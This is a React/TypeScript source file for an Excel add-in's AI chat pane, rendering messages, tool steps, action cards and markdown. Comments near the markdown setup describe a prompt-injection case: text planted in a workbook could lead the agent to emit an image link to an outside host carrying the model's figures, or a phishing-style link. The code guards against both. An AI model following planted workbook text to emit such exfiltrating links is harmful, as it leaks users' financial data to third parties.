import { memo } from 'react';
import { useTranslation } from 'react-i18next';
import ReactMarkdown, { type Components, type Options } from 'react-markdown';
import remarkGfm from 'remark-gfm';
import { TOOL_ASK_USER, type AuditFindingView, type AuditView, type ChatMessage, type FeedbackRating, type FeedbackTag, type MessageSegment, type QuestionAnswer, type TermsView, type ToolCard } from '../../types/agent';
import { activeAgent } from '../../services/agent/ChatSession';
import { openInBrowser } from '../../services/office/browser';
import { ActionCards, type ActionCardActions } from './ActionCard';
import { agentLabel } from './agentLabel';
import { CodeBlock, textOf } from './CodeBlock';
import { Spinner, ActivityLine } from './Spinner';
import { Delayed, useSmoothText } from './motion';
import { StepsList } from './StepsList';
import { BATCH_MIN, BatchProgress } from './BatchProgress';
import { ManualCard } from './ManualCard';
import { PlanCard } from './PlanCard';
import { AuditCard } from './AuditCard';
import { DriversCard } from './DriversCard';
import { MetricsCard } from './MetricsCard';
import { TermsCard } from './TermsCard';
import { MapCard } from './MapCard';
import { DocumentChips } from './AttachmentChips';
import { MessageFeedback } from './Feedback';
import { CellLink } from './CellLink';
import { remarkCellRefs } from './remarkCellRefs';
import { markdownBlocks } from './markdownBlocks';
import { QuestionCard } from './QuestionCard';
import { TurnClock } from './TurnClock';

export interface BubbleActions extends ActionCardActions {
  onDecideAll: (approved: boolean) => void;
  /** Answers of a Question card (sculpt-api PLAN-questions.md); optional so fixtures and tests that never
   *  see one keep compiling. */
  onAnswerQuestions?: (answers: QuestionAnswer[]) => void;
  /** The card's fields as they change, so a reply typed in the chat box carries them. */
  onQuestionDraft?: (answers: QuestionAnswer[]) => void;
  /** The user cancels the card: the turn goes on with the call declined, nothing is guessed. */
  onCancelQuestions?: () => void;
  /** Select a cell in Excel by address — what a declined formula's address, and any `Sheet!A1` the agent
   *  writes in its prose or a card names in its words, does when clicked. */
  onShowCell?: (sheet: string, cell: string) => void;
  /** Write the structural audit's card to an Audit Findings sheet; absent in a read-only thread. */
  onWriteAuditSheet?: (view: AuditView) => Promise<unknown>;
  /** Write the term sheet reconciliation's card to a Term Sheet Gaps sheet; absent in a read-only thread. */
  onWriteTermsSheet?: (view: TermsView) => Promise<unknown>;
  /** Ask the agent to apply one audit finding's fix; absent in a read-only thread or while a turn runs. */
  onFixFinding?: (finding: AuditFindingView) => void;
  /** The workbook's sheet names: a code span, or a reference in a card's words, is only a place when it names one
   *  of them. */
  sheets?: string[];
  /** Rate this turn (#41 key). Optional so existing fixtures and tests keep compiling; the thumbs stay
   *  hidden without it, and against a server that sends no `turn` event `turnIndex` is undefined anyway. */
  onRateMessage?: (turnIndex: number, rating: FeedbackRating, tags: FeedbackTag[], comment: string) => void;
  /** Take a rating back (thumb un-lit / "Not now"): deletes the row so the UI never shows less than it stored. */
  onRetractMessage?: (turnIndex: number) => void;
}

/** The tools that only read the index: while the model is calling them it is reading the workbook, and
 *  saying so is worth more than "Thinking…" for the minute it can take. */
const READ_TOOLS = new Set(['find', 'outline', 'describe_sheet', 'read_zone', 'read_range', 'trace', 'zone_links',
                            'resolve', 'resolve_object', 'period_map', 'siblings', 'placement', 'conventions', 'health']);
const PLAN_TOOLS = new Set(['start_add', 'start_edit', 'start_delete', 'submit_change_plan']);

/** Which phase of the turn the pane is looking at, from the cards it already has. */
export function turnPhase(m: ChatMessage): 'writing' | 'planning' | 'reading' | 'thinking' {
  const cards = m.toolCards ?? [];
  if (m.activity === 'excel') return 'writing';
  const last = [...cards].reverse().find((c) => c.status !== 'awaiting_confirmation');
  if (last && PLAN_TOOLS.has(last.tool_name)) return 'planning';
  if (last && READ_TOOLS.has(last.tool_name)) return 'reading';
  return 'thinking';
}

/** How far the batch has got: the cards are the work, so they are also the progress bar. */
export function writeProgress(m: ChatMessage): { done: number; total: number; sheet: string | null } | null {
  const cards = (m.toolCards ?? []).filter((c) => c.status !== 'awaiting_confirmation' || m.activity === 'excel');
  if (!cards.length) return null;
  const done = cards.filter((c) => c.status === 'done' || c.status === 'error' || c.status === 'cancelled').length;
  const running = cards.find((c) => c.status === 'running');
  const sheet = running?.target?.sheet ?? (typeof running?.input?.sheet === 'string' ? (running.input.sheet as string) : null);
  return { done, total: cards.length, sheet };
}

/** What the spinner says when the turn is busy but nothing visible is progressing. A turn can spend ninety
 *  seconds inside one model call; "Thinking…" alone leaves the user wondering whether it is stuck. */
export function activityLabel(m: ChatMessage, t: (k: string, o?: Record<string, unknown>) => string): string | null {
  if (!m.pending) return null;
  if (m.activity === 'index') return t('chat.updatingIndex');
  if (m.activity === 'context') return t('chat.checkingWorkbook');
  if (m.activity === 'understanding') return t('chat.awaitingUnderstanding');
  const cards = m.toolCards ?? [];
  const agent = activeAgent(m);
  if (agent) return `${agentLabel(agent, t)}…`;
  if (cards.some((c) => c.status === 'awaiting_confirmation')) return null; // the card is the call to action
  const phase = turnPhase(m);
  if (phase === 'writing') {
    const p = writeProgress(m);
    // A batch draws its own bar and names the sheet it is in; repeating that underneath it is one progress
    // report too many.
    if (cards.filter((c) => !c.requires_confirmation && !c.server).length >= BATCH_MIN) return null;
    if (p && p.total > 1) {
      return p.sheet
        ? t('chat.writingProgressSheet', { done: p.done + 1, total: p.total, sheet: p.sheet })
        : t('chat.writingProgress', { done: p.done, total: p.total });
    }
    return t('chat.workingExcel');
  }
  if (cards.some((c) => c.status === 'running')) return null; // a running read shows its own spinner
  if (phase === 'planning') return t('chat.planning');
  if (phase === 'reading') return t('chat.readingModel');
  return t('chat.thinking');
}

/** One turn (design 1b, reworked 2026-09-05): a right-aligned user bubble, or an agent turn rendered
 *  as an ordered timeline — text segments and tool segments in arrival order. Finished plain steps
 *  disappear; action cards stay (awaiting / applied / discarded / failed). The last text segment
 *  carries an inline spinner while streaming; otherwise a labelled spinner says what the turn waits on.
 *  Memoised: ChatSession replaces only the turn that changed, so a streamed token re-renders that turn alone. */
export const MessageBubble = memo(function MessageBubble({ m, actions }: { m: ChatMessage; actions: BubbleActions }) {
  const { t } = useTranslation();
  if (m.role === 'user') {
    return (
      <div className="flex origin-bottom-right animate-pc-send flex-col items-end">
        <div className="max-w-[85%] whitespace-pre-wrap wrap-break-word rounded-[10px_10px_2px_10px] bg-bubble px-3 py-2 text-[13px] leading-[1.45] text-ink">{m.content}</div>
        {m.documents?.length ? <DocumentChips documents={m.documents} /> : null}
      </div>
    );
  }
  const segments = m.segments ?? [];
  const cards = m.toolCards ?? [];
  const waiting = cards.filter((c) => c.requires_confirmation && c.status === 'awaiting_confirmation');
  const lastIndex = segments.length - 1;
  // Text is streaming when the turn is pending, waiting on the model and the last segment is text.
  const streamingText = !!m.pending && m.activity === 'model' && lastIndex >= 0 && segments[lastIndex].kind === 'text' && !cards.some((c) => c.status === 'running');
  const label = streamingText ? null : activityLabel(m, t);
  return (
    <div className="group flex animate-pc-in flex-col gap-2">
      {/* The Change Plan sits above the batch it produced: it says what is about to happen and what was
          deliberately left alone, and the batch below reports it happening. */}
      {m.plan && <PlanCard view={m.plan} onShowCell={actions.onShowCell} sheets={actions.sheets} />}
      {/* A manual write is declared before it runs, like a plan: why no operation covers it, and the only sheets
          it may touch. */}
      {m.manual && <ManualCard declaration={m.manual} onShowCell={actions.onShowCell} sheets={actions.sheets} />}
      {segments.map((seg, i) => (
        <Segment key={i} seg={seg} streaming={streamingText && i === lastIndex} error={!!m.error && i === lastIndex} waiting={waiting} actions={actions} />
      ))}
      {/* The structural audit's full list, under the model's short summary of it — once the turn has ended: before,
          the model may still be checking findings and dismiss some, and the card would change under the reader. */}
      {m.audit && !m.pending && <AuditCard view={m.audit} onShowCell={actions.onShowCell} sheets={actions.sheets} onWriteSheet={actions.onWriteAuditSheet} onFix={actions.onFixFinding} sheetUpdated={m.auditSheetUpdated} />}
      {/* The drivers of a number, under the model's explanation of them — once the turn has ended. */}
      {m.drivers && !m.pending && <DriversCard view={m.drivers} onShowCell={actions.onShowCell} sheets={actions.sheets} />}
      {/* The key dates and indicators, under the model's summary — once the turn has ended. */}
      {m.metrics && !m.pending && <MetricsCard view={m.metrics} onShowCell={actions.onShowCell} />}
      {/* The model map: its chains and where the assumptions sit, under the model's account of them. */}
      {m.model_map && !m.pending && <MapCard view={m.model_map} onShowCell={actions.onShowCell} />}
      {/* The term sheet against the model, every term, under the model's account of the gaps. */}
      {m.terms && !m.pending && <TermsCard view={m.terms} onShowCell={actions.onShowCell} sheets={actions.sheets} onWriteSheet={actions.onWriteTermsSheet} />}
      {/* The turn's clock sits next to what the agent is doing: after the activity label while there is one, else
          under the text, ahead of the feedback thumbs, where it stays once the turn has ended. */}
      {/* The turn's first word ("Checking the workbook…") shows at once: it answers the message just sent. */}
      {label && <ActivityLine label={label} trailing={<TurnClock m={m} />} delay={m.activity === 'context' ? 0 : undefined} />}
      <div className="-mt-1 flex items-center gap-2 empty:hidden">
        {!label && <TurnClock m={m} />}
        {!m.pending && !m.error && m.turnIndex != null && actions.onRateMessage && (
          <MessageFeedback turnIndex={m.turnIndex} saved={m.rating ?? null} onRate={actions.onRateMessage} onRetract={actions.onRetractMessage} />
        )}
      </div>
    </div>
  );
});

/** Every code span in the agent's prose is offered to `CellLink`, which turns the ones that name a real
 *  sheet into a button that selects the range in Excel; `remarkCellRefs` first makes a code span of a
 *  reference the agent left in plain prose. Built once per sheet list (ChatPanel keeps it the same array while the
 *  names do not change) and range selector — not per `actions`, which changes as a turn starts and ends: keyed on
 *  it, every turn of the thread was parsed again at the end of each turn. */
interface MarkdownSetup {
  components: Components;
  remarkPlugins: Options['remarkPlugins'];
}
const NO_SHEETS: string[] = [];
const markdownCache = new WeakMap<string[], Map<BubbleActions['onShowCell'], MarkdownSetup>>();

/** The URL a link in the agent's prose may open: an absolute `https:` one, else null. react-markdown keeps
 *  relative URLs and `http:` or `mailto:` ones, and a link rendered as is navigates the pane itself, which has no
 *  address bar: a "session expired" look-alike, or `/?selftest=1`, one click away in text the workbook planted
 *  (security audit 2026-10-13, AUD-23). */
export function externalHref(href: string | undefined): string | null {
  if (!href || !/^https:\/\//i.test(href)) return null;
  try {
    return new URL(href).href;
  } catch {
    return null;
  }
}

function markdownSetup(actions: BubbleActions): MarkdownSetup {
  const sheets = actions.sheets ?? NO_SHEETS;
  const bySelector = markdownCache.get(sheets) ?? new Map<BubbleActions['onShowCell'], MarkdownSetup>();
  markdownCache.set(sheets, bySelector);
  const cached = bySelector.get(actions.onShowCell);
  if (cached) return cached;
  const made: MarkdownSetup = {
    components: {
      code: ({ children, ...props }) => (
        <CellLink sheets={sheets} onSelectRange={actions.onShowCell} {...props}>
          {children}
        </CellLink>
      ),
      // An image is shown as its alt text, never fetched: the pane would load its URL with no click, so text planted
      // in a workbook could make the agent end a reply with `![](https://host/?d=<figures>)` and send the model's
      // figures to that host (security audit 2026-10-12, H2).
      img: ({ alt }) => (alt ? <span>[{alt}]</span> : null),
      // A link opens in the user's browser, never in the pane (`externalHref`); anything else is its text.
      a: ({ href, children }) => {
        const url = externalHref(href);
        return url ? (
          <a href={url} target="_blank" rel="noopener noreferrer" onClick={(e) => { e.preventDefault(); openInBrowser(url); }}>
            {children}
          </a>
        ) : (
          <span>{children}</span>
        );
      },
      // A fenced block (a macro to paste, a formula) gets a button that copies its plain text.
      pre: ({ node, children }) => <CodeBlock text={textOf(node)}>{children}</CodeBlock>,
    },
    remarkPlugins: [remarkGfm, remarkCellRefs(sheets)],
  };
  bySelector.set(actions.onShowCell, made);
  return made;
}

/** One block of the agent's prose, parsed only when its own text changes (`markdownBlocks`). */
const MarkdownBlock = memo(function MarkdownBlock({ text, setup }: { text: string; setup: MarkdownSetup }) {
  return <ReactMarkdown {...setup}>{text}</ReactMarkdown>;
});

function Markdown({ text, actions }: { text: string; actions: BubbleActions }) {
  const setup = markdownSetup(actions);
  return (
    <>
      {markdownBlocks(text).map((block, i) => (
        <MarkdownBlock key={i} text={block} setup={setup} />
      ))}
    </>
  );
}

function Segment({ seg, streaming, error, waiting, actions }: { seg: MessageSegment; streaming: boolean; error: boolean; waiting: ToolCard[]; actions: BubbleActions }) {
  const { t } = useTranslation();
  const markdown = useSmoothText(seg.kind === 'text' ? seg.markdown : '', streaming && !error);
  if (seg.kind === 'text') {
    if (!seg.markdown && !streaming) return null;
    return (
      <div className={`chat-md wrap-break-word ${error ? 'text-danger' : ''}`}>
        <Markdown text={markdown} actions={actions} />
        {streaming && !error && (
          <Delayed className="ml-1">
            <Spinner />
          </Delayed>
        )}
      </div>
    );
  }
  const steps = seg.cards.filter((c) => !c.requires_confirmation && c.tool_name !== TOOL_ASK_USER);
  // A Question is neither a step nor an approval: it is the turn waiting on the user (PLAN-questions.md).
  const questionCards = seg.cards.filter((c) => c.tool_name === TOOL_ASK_USER);
  const actionCards = seg.cards.filter((c) => c.requires_confirmation && c.tool_name !== TOOL_ASK_USER);
  const waitingHere = actionCards.filter((c) => waiting.includes(c));
  // A handful of steps is a list that empties itself as they finish; a batch is a card that stays, with a
  // bar and one row per sheet. Forty-eight rows of "Writing formulas" is not a trail, it is a wall.
  // Only the add-in's own calls make a batch: the agent's reads and plans are steps, however many — counted in, they
  // drew the execution card around reads and refused plans before anything was written (2026-10-08).
  const clientSteps = steps.filter((c) => !c.server);
  const batched = clientSteps.length >= BATCH_MIN;
  const serverSteps = steps.filter((c) => c.server);
  // StepsList keeps finished steps mounted for their leave transition and returns null itself once
  // nothing is left, so it is always rendered when the segment has steps.
  if (!steps.length && !actionCards.length && !questionCards.length) return null;
  return (
    <div className="flex flex-col gap-2 empty:hidden">
      {steps.length > 0 &&
        (batched ? (
          <>
            {serverSteps.length > 0 && <StepsList cards={serverSteps} onShow={actions.onShow} />}
            <BatchProgress cards={clientSteps} onShow={actions.onShow} />
          </>
        ) : (
          <StepsList cards={steps} onShow={actions.onShow} />
        ))}
      {waitingHere.length > 1 && (
        <div className="flex items-center justify-end gap-3 px-0.5 text-[11.5px]">
          <button type="button" onClick={() => actions.onDecideAll(true)} className="font-medium text-accent hover:text-accent-dark">
            {t('action.applyAll')}
          </button>
          <span className="text-line">·</span>
          <button type="button" onClick={() => actions.onDecideAll(false)} className="text-muted hover:text-ink">
            {t('action.discardAll')}
          </button>
        </div>
      )}
      {questionCards.map((c) => (
        <QuestionCard key={c.tool_call_id} card={c} onAnswer={(answers) => actions.onAnswerQuestions?.(answers)} onDraft={(answers) => actions.onQuestionDraft?.(answers)} onCancel={() => actions.onCancelQuestions?.()} onShowCell={actions.onShowCell} sheets={actions.sheets} />
      ))}
      <ActionCards cards={actionCards} actions={actions} />
    </div>
  );
}
